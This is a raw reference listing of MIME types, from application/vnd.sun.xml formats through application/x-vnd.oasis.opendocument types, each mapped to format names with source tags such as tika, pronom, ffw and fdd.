application/vnd.sun.xml.draw.templateOpenOffice.org XML ffw
SXD ffw
application/vnd.sun.xml.draw.template tika
application/vnd.sun.xml.impressSXI ffw
OpenOffice.org XML ffw
application/vnd.sun.xml.impress tika
—  application/vnd.sun.xml.impress; version=”1.0″OpenOffice Impress 1.0 pronom
application/vnd.sun.xml.impress.templateSXI ffw
OpenOffice.org XML ffw
application/vnd.sun.xml.impress.template tika
application/vnd.sun.xml.mathOpenOffice.org XML ffw
application/vnd.sun.xml.math tika
application/vnd.sun.xml.writerSXW ffw
OpenOffice.org XML ffw
OpenOffice v1.0: Writer Document tika
—  application/vnd.sun.xml.writer; version=”1.0″OpenOffice Writer 1.0 pronom
application/vnd.sun.xml.writer.globalOpenOffice.org XML ffw
application/vnd.sun.xml.writer.global tika
application/vnd.sun.xml.writer.templateSTW ffw
OpenOffice.org XML ffw
application/vnd.sun.xml.writer.template tika
application/vnd.sus-calendarapplication/vnd.sus-calendar tika
application/vnd.svdapplication/vnd.svd tika
application/vnd.swiftview-icsapplication/vnd.swiftview-ics tika
application/vnd.symbian.installapplication/vnd.symbian.install tika
application/vnd.syncml+xmlapplication/vnd.syncml+xml tika
application/vnd.syncml.dm+wbxmlapplication/vnd.syncml.dm+wbxml tika
application/vnd.syncml.dm+xmlapplication/vnd.syncml.dm+xml tika
application/vnd.syncml.dm.notificationapplication/vnd.syncml.dm.notification tika
application/vnd.syncml.ds.notificationapplication/vnd.syncml.ds.notification tika
application/vnd.tao.intent-module-archiveapplication/vnd.tao.intent-module-archive tika
application/vnd.tcpdump.pcapTCPDump pcap packet capture tika
pcap Packet Capture pronom
pcap Next Generation Packet Capture pronom
application/vnd.tmobile-livetvapplication/vnd.tmobile-livetv tika
application/vnd.trid.tptapplication/vnd.trid.tpt tika
application/vnd.triscape.mxsapplication/vnd.triscape.mxs tika
application/vnd.trueappapplication/vnd.trueapp tika
application/vnd.truedocPFR ffw
application/vnd.truedoc tika
application/vnd.ufdlapplication/vnd.ufdl tika
application/vnd.uiq.themeapplication/vnd.uiq.theme tika
application/vnd.umajinapplication/vnd.umajin tika
application/vnd.unityapplication/vnd.unity tika
application/vnd.uoml+xmlapplication/vnd.uoml+xml tika
application/vnd.uplanet.alertapplication/vnd.uplanet.alert tika
application/vnd.uplanet.alert-wbxmlapplication/vnd.uplanet.alert-wbxml tika
application/vnd.uplanet.bearer-choiceapplication/vnd.uplanet.bearer-choice tika
application/vnd.uplanet.bearer-choice-wbxmlapplication/vnd.uplanet.bearer-choice-wbxml tika
application/vnd.uplanet.cacheopapplication/vnd.uplanet.cacheop tika
application/vnd.uplanet.cacheop-wbxmlapplication/vnd.uplanet.cacheop-wbxml tika
application/vnd.uplanet.channelapplication/vnd.uplanet.channel tika
application/vnd.uplanet.channel-wbxmlapplication/vnd.uplanet.channel-wbxml tika
application/vnd.uplanet.listapplication/vnd.uplanet.list tika
application/vnd.uplanet.list-wbxmlapplication/vnd.uplanet.list-wbxml tika
application/vnd.uplanet.listcmdapplication/vnd.uplanet.listcmd tika
application/vnd.uplanet.listcmd-wbxmlapplication/vnd.uplanet.listcmd-wbxml tika
application/vnd.uplanet.signalapplication/vnd.uplanet.signal tika
application/vnd.valve.source.materialValve Material Type ffw
application/vnd.vcxapplication/vnd.vcx tika
application/vnd.vd-studyapplication/vnd.vd-study tika
application/vnd.vectorworksapplication/vnd.vectorworks tika
—  application/vnd.vectorworks; version=”12.5″VectorWorks 12.5 pronom
—  application/vnd.vectorworks; version=”2009″VectorWorks 2009 pronom
—  application/vnd.vectorworks; version=”2010″Vectorworks 2010 pronom
—  application/vnd.vectorworks; version=”2015″Vectorworks 2015 pronom
application/vnd.vidsoft.vidconferenceapplication/vnd.vidsoft.vidconference tika
application/vnd.visio2013Visio VSDX Drawing File Format fdd
Visio VSDX Drawing File Format fdd
application/vnd.visionaryapplication/vnd.visionary tika
application/vnd.vividence.scriptfileapplication/vnd.vividence.scriptfile tika
application/vnd.vsfapplication/vnd.vsf tika
application/vnd.wap.sicapplication/vnd.wap.sic tika
application/vnd.wap.slcapplication/vnd.wap.slc tika
application/vnd.wap.wbxmlapplication/vnd.wap.wbxml tika
application/vnd.wap.wmlcCompiled WML Document tika
application/vnd.wap.wmlscriptcCompiled WML Script tika
application/vnd.webturboapplication/vnd.webturbo tika
application/vnd.wfa.wscapplication/vnd.wfa.wsc tika
application/vnd.wmcapplication/vnd.wmc tika
application/vnd.wmf.bootstrapapplication/vnd.wmf.bootstrap tika
application/vnd.wolfram.cdfComputable Document Format ffw
application/vnd.wolfram.cdf.textComputable Document Format ffw
application/vnd.wordperfectWordPerfect ffw
application/vnd.wordperfect tika
—  application/vnd.wordperfect; version=”4.0/4.1/4.2″WordPerfect 4.0/4.1/4.2 pronom
—  application/vnd.wordperfect; version=”5.0″WordPerfect for MS-DOS Document 5.0 pronom
—  application/vnd.wordperfect; version=”5.1″WordPerfect for MS-DOS/Windows Document 5.1 pronom
—  application/vnd.wordperfect; version=”5.2″WordPerfect for Windows Document 5.2 pronom
—  application/vnd.wordperfect; version=”6 onwards”Compound WordPerfect for Windows Document 6 onwards pronom
—  application/vnd.wordperfect; version=”6.0″WordPerfect for MS-DOS/Windows Document 6.0 pronom
application/vnd.wqdapplication/vnd.wqd tika
application/vnd.wrq-hp3000-labelledapplication/vnd.wrq-hp3000-labelled tika
application/vnd.wt.stfapplication/vnd.wt.stf tika
application/vnd.wv.csp+wbxmlapplication/vnd.wv.csp+wbxml tika
application/vnd.wv.csp+xmlapplication/vnd.wv.csp+xml tika
application/vnd.wv.ssp+xmlapplication/vnd.wv.ssp+xml tika
application/vnd.xaraXar (vector graphics) ffw
application/vnd.xara tika
application/vnd.xfdlapplication/vnd.xfdl tika
application/vnd.xfdl.webformapplication/vnd.xfdl.webform tika
application/vnd.xmi+xmlXML Metadata Interchange ffw
application/vnd.xmi+xml tika
application/vnd.xmpie.cpkgapplication/vnd.xmpie.cpkg tika
application/vnd.xmpie.dpkgapplication/vnd.xmpie.dpkg tika
application/vnd.xmpie.planapplication/vnd.xmpie.plan tika
application/vnd.xmpie.ppkgapplication/vnd.xmpie.ppkg tika
application/vnd.xmpie.xlimapplication/vnd.xmpie.xlim tika
application/vnd.yamaha.hv-dicapplication/vnd.yamaha.hv-dic tika
application/vnd.yamaha.hv-scriptapplication/vnd.yamaha.hv-script tika
application/vnd.yamaha.hv-voiceapplication/vnd.yamaha.hv-voice tika
application/vnd.yamaha.openscoreformatapplication/vnd.yamaha.openscoreformat tika
application/vnd.yamaha.openscoreformat.osfpvg+xmlapplication/vnd.yamaha.openscoreformat.osfpvg+xml tika
application/vnd.yamaha.smaf-audioapplication/vnd.yamaha.smaf-audio tika
application/vnd.yamaha.smaf-phraseapplication/vnd.yamaha.smaf-phrase tika
application/vnd.yellowriver-custom-menuapplication/vnd.yellowriver-custom-menu tika
application/vnd.zulapplication/vnd.zul tika
application/vnd.zzazz.deck+xmlapplication/vnd.zzazz.deck+xml tika
application/voicexml+xmlapplication/voicexml+xml tika
application/warcWARC ffw
WARC, Web ARChive file format fdd
application/warc-fieldsWARC ffw
application/watcherinfo+xmlapplication/watcherinfo+xml tika
application/whoispp-queryapplication/whoispp-query tika
application/whoispp-responseapplication/whoispp-response tika
application/winhlpapplication/winhlp tika
application/witaapplication/wita tika
application/wordperfectapplication/vnd.wordperfect tika
application/wordperfect5.1application/wordperfect5.1 tika
application/wsdl+xmlapplication/wsdl+xml tika
application/wspolicy+xmlapplication/wspolicy+xml tika
application/x-123application/x-123 tika
application/x-3ds3DS ffw
application/x-3dxmlplugin3DXML ffw
application/x-7z-compressed7z ffw
7-zip archive tika
application/x-abiwordapplication/x-abiword tika
application/x-acadDWG ffw
AutoCad Drawing tika
application/x-ace-compressedapplication/x-ace-compressed tika
application/x-adobe-indesignAdobe InDesign document tika
application/x-apple-diskimageApple Disk Image ffw
application/x-apple-diskimage tika
application/x-appleworksapplication/x-appleworks tika
application/x-archiveapplication/x-archive tika
—  application/vnd.debian.binary-packageDeb ffw
application/x-debian-package tika
—  application/x-debian-packageapplication/x-debian-package tika
application/x-arjapplication/x-arj tika
application/x-arj-compressedapplication/x-arj tika
application/x-aspxASP.NET githublinguist
application/x-astrotite-afaAstrotite ffw
application/x-authorware-binapplication/x-authorware-bin tika
application/x-authorware-mapapplication/x-authorware-map tika
application/x-authorware-segapplication/x-authorware-seg tika
application/x-autocadDWG ffw
AutoCad Drawing tika
application/x-axcryptAxCrypt tika
application/x-b6z-compressedB6Z ffw
application/x-bcpioapplication/x-bcpio tika
application/x-berkeley-dbBerkeley DB tika
—  application/x-berkeley-db;format=btreeBerkeley DB BTree Database tika
— —  application/x-berkeley-db;format=btree;version=2Berkeley DB Version 2 BTree Database tika
— —  application/x-berkeley-db;format=btree;version=3Berkeley DB Version 3 BTree Database tika
— —  application/x-berkeley-db;format=btree;version=4Berkeley DB Version 4 and 5 BTree Database tika
—  application/x-berkeley-db;format=hashBerkeley DB Hash Database tika
— —  application/x-berkeley-db;format=hash;version=2Berkeley DB Version 2 Hash Database tika
— —  application/x-berkeley-db;format=hash;version=3Berkeley DB Version 3 Hash Database tika
— —  application/x-berkeley-db;format=hash;version=4Berkeley DB Version 4 Hash Database tika
— —  application/x-berkeley-db;format=hash;version=5Berkeley DB Version 5 Hash Database tika
—  application/x-berkeley-db;format=logBerkeley DB Log Database tika
—  application/x-berkeley-db;format=queueBerkeley DB Queue Database tika
application/x-bittorrentTorrent file ffw
application/x-bittorrent tika
application/x-bplistapplication/x-bplist tika
—  application/x-webarchiveapplication/x-webarchive tika
application/x-bzipapplication/x-bzip tika
—  application/x-bzip2Bzip2 ffw
Bzip 2 UNIX Compressed File tika
BZIP2 Compressed Archive pronom
application/x-cbrComic Book Archive ffw
application/x-cdfCD Audio pronom
application/x-cdlinkVirtual CD-ROM CD Image File tika
application/x-cfs-compressedCompact File Set ffw
application/x-chatapplication/x-chat tika
application/x-chess-pgnPGN ffw
application/x-chess-pgn tika
application/x-chrome-packageChrome Extension Package tika
application/x-compressCompress (Unix) ffw
application/x-compress tika
Tape Archive (tar) File Format Family fdd
application/x-compressedTape Archive (tar) File Format Family fdd
application/x-cpioCpio ffw
UNIX CPIO Archive tika
application/x-cshapplication/x-csh tika
application/x-csvCSV ffw
application/x-dbasedBASE Table File Format (DBF) fdd
application/x-dbfdBASE Table File Format (DBF) fdd
application/x-dbmBerkeley DB tika
application/x-deflateZLIB Compressed Data Format tika
application/x-dexDalvik Executable Format tika
application/x-dgc-compressedDGCA ffw
application/x-directorShockwave (Director) ffw
Shockwave Movie tika
—  application/x-director; version=”macintosh”Macromedia Director Macintosh pronom
—  application/x-director; version=”pc”Macromedia Director PC pronom
application/x-doomapplication/x-doom tika
application/x-dtbncx+xmlapplication/x-dtbncx+xml tika
DTB (Digital Talking Book), 2005 fdd
application/x-dtbook+xmlapplication/x-dtbook+xml tika
DTB (Digital Talking Book), 2005 fdd
application/x-dtbresource+xmlapplication/x-dtbresource+xml tika
application/x-dviDVI (Device Independent File Format) ffw
TeX Device Independent Document tika
TeX Binary File pronom
TeX/LaTeX Device Independent Document pronom
application/x-dwgDWG ffw
AutoCad Drawing tika
application/x-elcEmacs Lisp bytecode tika
application/x-elfapplication/x-elf tika
—  application/x-coredumpapplication/x-coredump tika
—  application/x-executableapplication/x-executable tika
—  application/x-objectapplication/x-object tika
—  application/x-sharedlibapplication/x-sharedlib tika
application/x-emfExtended Metafile tika
application/x-endnote-connectEndNote Connection File pronom
application/x-endnote-connectionEndNote Connection File pronom
application/x-endnote-referEndNote Import File pronom
application/x-endnote-styleEndNote Style File pronom
application/x-erbHTML+ERB githublinguist
application/x-filemakerFileMaker Pro 7 tika
—  application/x-filemaker; version=”3″FileMaker Pro Database 3 pronom
application/x-font-adobe-metricAdobe Font Metric tika
application/x-font-bdfapplication/x-font-bdf tika
application/x-font-dosapplication/x-font-dos tika
application/x-font-framemakerapplication/x-font-framemaker tika
application/x-font-ghostscriptapplication/x-font-ghostscript tika
application/x-font-libgrxapplication/x-font-libgrx tika
application/x-font-linux-psfapplication/x-font-linux-psf tika
application/x-font-otfOpenType Font tika
application/x-font-pcfapplication/x-font-pcf tika
application/x-font-printer-metricPrinter Font Metric tika
application/x-font-snfapplication/x-font-snf tika
application/x-font-speedoapplication/x-font-speedo tika
application/x-font-sunos-newsapplication/x-font-sunos-news tika
application/x-font-ttfTrueType Font tika
application/x-font-type1application/x-font-type1 tika
application/x-font-vfontapplication/x-font-vfont tika
application/x-foxmailFoxmail Email File tika
application/x-frameFrameMaker Interchange Format tika
application/x-freemindMm ffw
application/x-futuresplashMacromedia FutureSplash File tika
application/x-gca-compressedGCA ffw
application/x-glulxGlulx ffw
application/x-gnucashapplication/x-gnucash tika
application/x-gnumericGnumeric ffw
application/x-gnumeric tika
application/x-gnumeric-spreadsheetapplication/x-gnumeric tika
application/x-gribGeneral Regularly-distributed Information in Binary form tika
application/x-gunzipGzip Compressed Archive tika
application/x-gzipGzip ffw
Unity package file ffw
Gzip Compressed Archive tika
GZIP Format pronom
—  application/x-ms-wmzapplication/x-ms-wmz tika
application/x-gzip-compressedGzip Compressed Archive tika
application/x-hdfHDF ffw
HDF4 ffw
Hierarchical Data Format File tika
HDF4, Hierarchical Data Format, Version 4 and earlier fdd
application/x-httpd-phpHTML+PHP githublinguist
PHP githublinguist
Hack githublinguist
application/x-hwpHangul Word Processor File tika
application/x-internet-archive; version=”1.0″Internet Archive 1.0 pronom
application/x-isatabISA-Tab Study file tika
application/x-isatab-assayISA-Tab Assay file tika
application/x-isatab-investigationISA-Tab Investigation file tika
application/x-iso9660-imageISO image ffw
ISO 9660 ffw
ISO 9660 CD-ROM filesystem data tika
ISO Disk Image File Format fdd
—  application/x-roxio-toastTOAST ffw
application/x-roxio-toast tika
application/x-javaJava Class File tika
application/x-java-jnilibJava Native Library for OSX tika
application/x-java-jnlp-fileJava Network Launching Protocol ffw
application/x-java-jnlp-file tika
application/x-java-pack200application/x-java-pack200 tika
application/x-java-vmJava Class File tika
application/x-jpgJFIF, JPEG File Interchange Format, Version 1.02 fdd
application/x-jspGroovy Server Pages githublinguist
Java Server Pages githublinguist
application/x-kchartKChart File tika
application/x-kdelnkapplication/x-kdelnk tika
application/x-killustratorKIllustrator File tika
application/x-koanSSEYO Koan File tika
application/x-kpresenterKPresenter File tika
application/x-kritaKrita ffw
Krita Document Format pronom
application/x-kspreadKSpread File tika
application/x-kwordKWord File tika
application/x-lhaapplication/x-lha tika
application/x-lharcapplication/x-lharc tika
application/x-lotus-notesNotes Storage Facility ffw
Lotus Notes Storage Facility fdd
application/x-lzh-compressedLHA ffw
application/x-lzipLzip ffw
application/x-lzmaLZMA Alone ffw
application/x-macbinaryMacBinary ffw
application/x-maffMAFF ffw
application/x-matlab-dataMAT ffw
Matlab figure ffw
application/x-matlab-data tika
MAT-File Level 5 File Format fdd
application/x-matroskaMatroska Media Container tika
—  audio/x-matroskaaudio/x-matroska tika
—  video/webmWebM ffw
video/webm tika
WebM pronom
WebM fdd
—  video/x-matroskaMKV ffw
video/x-matroska tika
application/x-midiMIDI ffw
Standard MIDI File Format fdd
application/x-mifFrameMaker Interchange Format tika
application/x-mobipocket-ebookapplication/x-mobipocket-ebook tika
Mobipocket File Format fdd
application/x-mplayer2ASF (Advanced Systems Format) fdd
application/x-ms-applicationapplication/x-ms-application tika
application/x-ms-wimWindows Imaging Format ffw
application/x-ms-wmdapplication/x-ms-wmd tika
application/x-ms-xbapapplication/x-ms-xbap tika
application/x-msaccessapplication/x-msaccess tika
application/x-msbinderapplication/x-msbinder tika
application/x-mscardfileapplication/x-mscardfile tika
application/x-msclipapplication/x-msclip tika
application/x-msdownloadapplication/x-msdownload tika
—  application/x-dosexecDOS/Windows executable (EXE) tika
—  application/x-msdownload;format=peapplication/x-msdownload;format=pe tika
— —  application/x-msdownload;format=pe-arm7application/x-msdownload;format=pe-arm7 tika
— —  application/x-msdownload;format=pe-armleapplication/x-msdownload;format=pe-armLE tika
— —  application/x-msdownload;format=pe-itaniumapplication/x-msdownload;format=pe-itanium tika
— —  application/x-msdownload;format=pe32application/x-msdownload;format=pe32 tika
— —  application/x-msdownload;format=pe64application/x-msdownload;format=pe64 tika
application/x-msmediaviewapplication/x-msmediaview tika
application/x-msmetafileWindows Metafile tika
application/x-msmoneyapplication/x-msmoney tika
application/x-msoActiveMime ffw
application/x-mspublisherapplication/x-mspublisher tika
application/x-msscheduleapplication/x-msschedule tika
application/x-msterminalapplication/x-msterminal tika
application/x-mswriteapplication/x-mswrite tika
application/x-mysql-dbapplication/x-mysql-db tika
—  application/x-mysql-misam-compressed-indexMySQL MISAM Compressed Index tika
—  application/x-mysql-misam-dataMySQL MISAM Data tika
—  application/x-mysql-misam-indexMySQL MISAM Index tika
—  application/x-mysql-table-definitionMySQL Table Definition (Format) tika
application/x-navi-animationWindows Animated Cursor ffw
application/x-netcdfapplication/x-netcdf tika
netCDF-3 Classic pronom
netCDF-3 64-bit pronom
NetCDF-3 (Network Common Data Form, version 3) fdd
application/x-ofx; version=”1.02″Open Financial Exchange 1.02 pronom
application/x-ofx; version=”1.03″Open Financial Exchange 1.03 pronom
application/x-ofx; version=”1.6″Open Financial Exchange 1.6 pronom
application/x-ofx; version=”2.0.3″Open Financial Exchange 2.0.3 pronom
application/x-ofx; version=”2.1.1″Open Financial Exchange 2.1.1 pronom
application/x-pdfPortable Document Format tika
PDF (Portable Document Format) Family fdd
application/x-pkcs12application/x-pkcs12 tika
application/x-pkcs7-certificatesapplication/x-pkcs7-certificates tika
application/x-pkcs7-certreqrespapplication/x-pkcs7-certreqresp tika
application/x-pn-mpgMPEG-2 Video Encoding (H.262) fdd
MPEG-1 Video Coding (H.261) fdd
MPEG-2 Encoding Family fdd
application/x-powershellPowerShell githublinguist
application/x-prtapplication/x-prt tika
application/x-rarRAR archive tika
application/x-rar-compressedRAR ffw
RAR archive tika
RAR Archive File Format Family fdd
application/x-riffMIDI Instrument Definition File ffw
application/x-rpmRedHat Package Manager tika
application/x-sas-accessSAS Access Descriptor tika
application/x-sas-auditSAS Audit tika
application/x-sas-backupSAS Backup tika
application/x-sas-catalogSAS Catalog tika
application/x-sas-dataSAS Data Set tika
application/x-sas-data-indexSAS Data Set Index tika
application/x-sas-dmdbSAS DMDB Data Mining Database File tika
application/x-sas-fdbSAS FDB Consolidation Database File tika
application/x-sas-itemstorSAS Item Store (ItemStor) File tika
application/x-sas-mddbSAS MDDB Multi-Dimensional Database File tika
application/x-sas-program-dataSAS Stored Program (DATA Step) tika
application/x-sas-putilitySAS Permanent Utility tika
application/x-sas-transportSAS Transport File tika
application/x-sas-utilitySAS Utility tika
application/x-sas-viewSAS Data Set View tika
application/x-sas-xportSAS Transport File Format (XPORT) Family fdd
application/x-scapplication/x-sc tika
application/x-sharapplication/x-shar tika
Shell Archive Format pronom
application/x-shockwave-flashSWF ffw
Adobe Flash tika
Macromedia Flash SWF File Format, Version 7 fdd
Macromedia Flash SWF File Format, Version 8 fdd
—  application/x-shockwave-flash; version=”1″Macromedia Flash 1 pronom
—  application/x-shockwave-flash; version=”10″Adobe Flash 10 pronom
—  application/x-shockwave-flash; version=”11″Adobe Flash 11 pronom
—  application/x-shockwave-flash; version=”12″Adobe Flash 12 pronom
—  application/x-shockwave-flash; version=”13″Adobe Flash 13 pronom
—  application/x-shockwave-flash; version=”14″Adobe Flash 14 pronom
—  application/x-shockwave-flash; version=”15″Adobe Flash 15 pronom
—  application/x-shockwave-flash; version=”16″Adobe Flash 16 pronom
—  application/x-shockwave-flash; version=”17″Adobe Flash 17 pronom
—  application/x-shockwave-flash; version=”18″Adobe Flash 18 pronom
—  application/x-shockwave-flash; version=”19″Adobe Flash 19 pronom
—  application/x-shockwave-flash; version=”2″Macromedia Flash 2 pronom
—  application/x-shockwave-flash; version=”20″Adobe Flash 20 pronom
—  application/x-shockwave-flash; version=”21″Adobe Flash 21 pronom
—  application/x-shockwave-flash; version=”22″Adobe Flash 22 pronom
—  application/x-shockwave-flash; version=”23″Adobe Flash 23 pronom
—  application/x-shockwave-flash; version=”24″Adobe Flash 24 pronom
—  application/x-shockwave-flash; version=”25″Adobe Flash 25 pronom
—  application/x-shockwave-flash; version=”26″Adobe Flash 26 pronom
—  application/x-shockwave-flash; version=”27″Adobe Flash 27 pronom
—  application/x-shockwave-flash; version=”28″Adobe Flash 28 pronom
—  application/x-shockwave-flash; version=”29″Adobe Flash 29 pronom
—  application/x-shockwave-flash; version=”3″Macromedia Flash 3 pronom
—  application/x-shockwave-flash; version=”30″Adobe Flash 30 pronom
—  application/x-shockwave-flash; version=”4″Macromedia Flash 4 pronom
—  application/x-shockwave-flash; version=”5″Macromedia Flash 5 pronom
—  application/x-shockwave-flash; version=”6″Macromedia Flash 6 pronom
—  application/x-shockwave-flash; version=”7″Macromedia Flash 7 pronom
—  application/x-shockwave-flash; version=”8″Adobe Flash 8 pronom
—  application/x-shockwave-flash; version=”9″Adobe Flash 9 pronom
application/x-silverlight-appSilverlight ffw
application/x-silverlight-app tika
application/x-sitStuffIt ffw
application/x-sitxStuffIt X ffw
application/x-sldAutoCAD Slide pronom
application/x-snappy-framedSnappy ffw
Snappy Framed tika
application/x-spss-porSPSS Portable File, ASCII encoding fdd
application/x-spss-savSAV ffw
SPSS System Data File Format Family (.sav) fdd
application/x-sqlite3SQLite ffw
application/x-sqlite3 tika
SQLite Database File Format pronom
application/x-starcalcSDC ffw
application/x-stardrawSDA (StarOffice) ffw
application/x-starwriterSDW ffw
application/x-stuffitStuffIt ffw
application/x-stuffit tika
application/x-stuffitxStuffIt X ffw
application/x-stuffitx tika
application/x-sv4cpioapplication/x-sv4cpio tika
application/x-sv4crcapplication/x-sv4crc tika
application/x-t3vm-imageTADS 3 ffw
application/x-tadsTADS ffw
application/x-tarTape Archive ffw
application/x-tar tika
Tape Archive Format pronom
Tape Archive (tar) File Format Family fdd
—  application/x-gtarGNU tar Compressed File Archive (GNU Tape Archive) tika
Tape Archive (tar) File Format Family fdd
application/x-tex-tfmapplication/x-tex-tfm tika
application/x-texinfoapplication/x-texinfo tika
application/x-tifTIFF, Revision 6.0 fdd
application/x-tiffTIFF, Revision 6.0 fdd
application/x-tika-msofficeapplication/x-tika-msoffice tika
—  application/msexcelMicrosoft Excel Spreadsheet tika
—  application/mspowerpointMicrosoft Powerpoint Presentation tika
—  application/mswordDOC ffw
Microsoft Word ffw
Microsoft Word ffw
Microsoft Word ffw
Microsoft Word ffw
Microsoft Word for Macintosh ffw
Microsoft Word Document tika
Microsoft Office Word 97-2003 Binary File Format (.doc) fdd
— —  application/msword; version=”1.0″Microsoft Word for Windows Document 1.0 pronom
Microsoft Word for Macintosh Document 1.0 pronom
— —  application/msword; version=”2.0″Microsoft Word for Windows Document 2.0 pronom
— —  application/msword; version=”3.0″Microsoft Word for Macintosh Document 3.0 pronom
Microsoft Word for MS-DOS Document 3.0 pronom
— —  application/msword; version=”4.0″Microsoft Word for Macintosh Document 4.0 pronom
Microsoft Word for MS-DOS Document 4.0 pronom
— —  application/msword; version=”5.0″Microsoft Word for Macintosh Document 5.0 pronom
Microsoft Word for MS-DOS Document 5.0 pronom
— —  application/msword; version=”5.5″Microsoft Word for MS-DOS Document 5.5 pronom
— —  application/msword; version=”6.0-2003″Microsoft Word (Generic) 6.0-2003 pronom
— —  application/msword; version=”6.0/95″Microsoft Word Document 6.0/95 pronom
— —  application/msword; version=”97-2003″Microsoft Word Document 97-2003 pronom
Microsoft Word Document (Password Protected) 97-2003 pronom
Microsoft Word Document Template (Password Protected) 97-2003 pronom
—  application/sldworksSolidWorks CAD program tika
—  application/vnd.ms-excelXLS ffw
Microsoft Excel ffw
Microsoft Excel ffw
Microsoft Excel ffw
Microsoft Excel ffw
XLM ffw
Microsoft Excel Spreadsheet tika
Microsoft Office Excel 97-2003 Binary File Format (.xls, BIFF8) fdd
— —  application/vnd.ms-excel; version=”2″Microsoft Excel 2.x Worksheet (xls) 2 pronom
— —  application/vnd.ms-excel; version=”2.x”Microsoft Excel Chart 2.x pronom
Microsoft Excel Macro 2.x pronom
— —  application/vnd.ms-excel; version=”3″Microsoft Excel 3.0 Worksheet (xls) 3 pronom
— —  application/vnd.ms-excel; version=”3.0″Microsoft Excel Chart 3.0 pronom
Microsoft Excel Macro 3.0 pronom
— —  application/vnd.ms-excel; version=”4.0″Microsoft Excel Macro 4.0 pronom
— —  application/vnd.ms-excel; version=”4s”Microsoft Excel 4.0 Worksheet (xls) 4S pronom
— —  application/vnd.ms-excel; version=”4w”Microsoft Excel 4.0 Workbook (xls) 4W pronom
— —  application/vnd.ms-excel; version=”5/95″Microsoft Excel 5.0/95 Workbook (xls) 5/95 pronom
— —  application/vnd.ms-excel; version=”8″Microsoft Excel 97 Workbook (xls) 8 pronom
— —  application/vnd.ms-excel; version=”8x”Microsoft Excel 2000-2003 Workbook (xls) 8X pronom
— —  application/x-tika-msworks-spreadsheetapplication/x-tika-msworks-spreadsheet tika
—  application/vnd.ms-outlookPersonal Folder File ffw
Microsoft Outlook Message tika
Microsoft Outlook PST 97-2002 (ANSI) fdd
Microsoft Outlook Item (MSG) fdd
—  application/vnd.ms-powerpointPPT ffw
Microsoft PowerPoint ffw
Microsoft Powerpoint Presentation tika
Microsoft Office PowerPoint 97-2003 Binary File Format (.ppt) fdd
— —  application/vnd.ms-powerpoint; version=”4.0″Microsoft Powerpoint Presentation 4.0 pronom
— —  application/vnd.ms-powerpoint; version=”95″Microsoft Powerpoint Presentation 95 pronom
— —  application/vnd.ms-powerpoint; version=”97-2003″Microsoft Powerpoint Presentation Show 97-2003 pronom
Microsoft Powerpoint Presentation 97-2003 pronom
—  application/vnd.ms-projectapplication/vnd.ms-project tika
— —  application/vnd.ms-project; version=”2000-2003″Microsoft Project 2000-2003 pronom
— —  application/vnd.ms-project; version=”2007″Microsoft Project 2007 pronom
— —  application/vnd.ms-project; version=”2010″Microsoft Project 2010 pronom
— —  application/vnd.ms-project; version=”4.0″Microsoft Project 4.0 pronom
— —  application/vnd.ms-project; version=”95″Microsoft Project 95 pronom
— —  application/vnd.ms-project; version=”98″Microsoft Project 98 pronom
—  application/vnd.ms-visioMicrosoft Visio Diagram tika
—  application/vnd.ms-wordDOC ffw
Microsoft Word Document tika
—  application/vnd.ms-worksapplication/vnd.ms-works tika
—  application/vnd.visioVisio ffw
Microsoft Visio Diagram tika
Microsoft Visio (generic) pronom
Visio VSDX Drawing File Format fdd
Visio VSDX Drawing File Format fdd
— —  application/vnd.visio; version=”2000″Microsoft Visio Drawing 2000 pronom
— —  application/vnd.visio; version=”2002″Microsoft Visio Drawing 2002 pronom
— —  application/vnd.visio; version=”2003-2010″Microsoft Visio XML Drawing 2003-2010 pronom
Microsoft Visio Drawing 2003-2010 pronom
— —  application/vnd.visio; version=”5.0″Microsoft Visio Drawing 5.0 pronom
—  application/x-corelpresentationsapplication/x-corelpresentations tika
—  application/x-hwp-v5Hangul Word Processor File v5 tika
—  application/x-ms-installerMicrosoft Windows Installer tika
—  application/x-msiMicrosoft Windows Installer tika
—  application/x-quattro-proapplication/x-quattro-pro tika
—  application/x-tika-msoffice-embeddedapplication/x-tika-msoffice-embedded tika
— —  application/x-tika-msoffice-embedded;format=comp_objCompObj OLE2 Embedded Document tika
— —  application/x-tika-msoffice-embedded;format=ole10_nativeOLE10 Native Embedded Document tika
—  application/x-tika-starofficeapplication/x-tika-staroffice tika
— —  application/vnd.stardivision.calcSDC ffw
StarOffice binary formats ffw
application/vnd.stardivision.calc tika
— —  application/vnd.stardivision.drawStarOffice binary formats ffw
SDA (StarOffice) ffw
application/vnd.stardivision.draw tika
— — —  application/vnd.stardivision.draw; version=”5.x”StarOffice Draw 5.x pronom
— —  application/vnd.stardivision.impressStarOffice binary formats ffw
application/vnd.stardivision.impress tika
— —  application/vnd.stardivision.writerSDW ffw
StarOffice binary formats ffw
application/vnd.stardivision.writer tika
— — —  application/vnd.stardivision.writer; version=”5.x”StarOffice Writer 5.x pronom
— —  application/x-staroffice-templateapplication/x-staroffice-template tika
—  application/x-windows-installerMicrosoft Windows Installer tika
application/x-tika-old-excelPre-OLE2 (Old) Microsoft Excel Worksheets tika
—  application/vnd.ms-excel.sheet.2Microsoft Excel 2 Worksheet tika
—  application/vnd.ms-excel.sheet.3Microsoft Excel 3 Worksheet tika
—  application/vnd.ms-excel.sheet.4Microsoft Excel 4 Worksheet tika
—  application/vnd.ms-excel.workspace.3Microsoft Excel 3 Workspace tika
—  application/vnd.ms-excel.workspace.4Microsoft Excel 4 Workspace tika
application/x-tika-unix-dumpapplication/x-tika-unix-dump tika
application/x-troffRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
application/x-troff-manRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
application/x-troff-meRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
application/x-troff-msRoff/nroff/troff/groff Unformatted Manual Page (UNIX) tika
application/x-troff-msvideoAVI (Audio Video Interleaved) File Format fdd
application/x-uc2-compressedapplication/x-uc2-compressed tika
application/x-unix-archiveapplication/x-archive tika
application/x-urlInternet Shortcut ffw
application/x-ustarapplication/x-ustar tika
application/x-vhdVirtual PC Virtual Hard Disk tika
application/x-vmdkVirtual Disk Format tika
application/x-vnd.corel.designer.document+zipCorel Designer ffw
application/x-vnd.corel.zcf.designer.document+zipCorel Designer ffw
application/x-vnd.oasis.opendocument.chartOpenDocument v1.0: Chart document tika
application/x-vnd.oasis.opendocument.chart-templateOpenDocument v1.0: Chart document used as template tika
application/x-vnd.oasis.opendocument.formula-templateOpenDocument v1.0: Formula document used as template tika
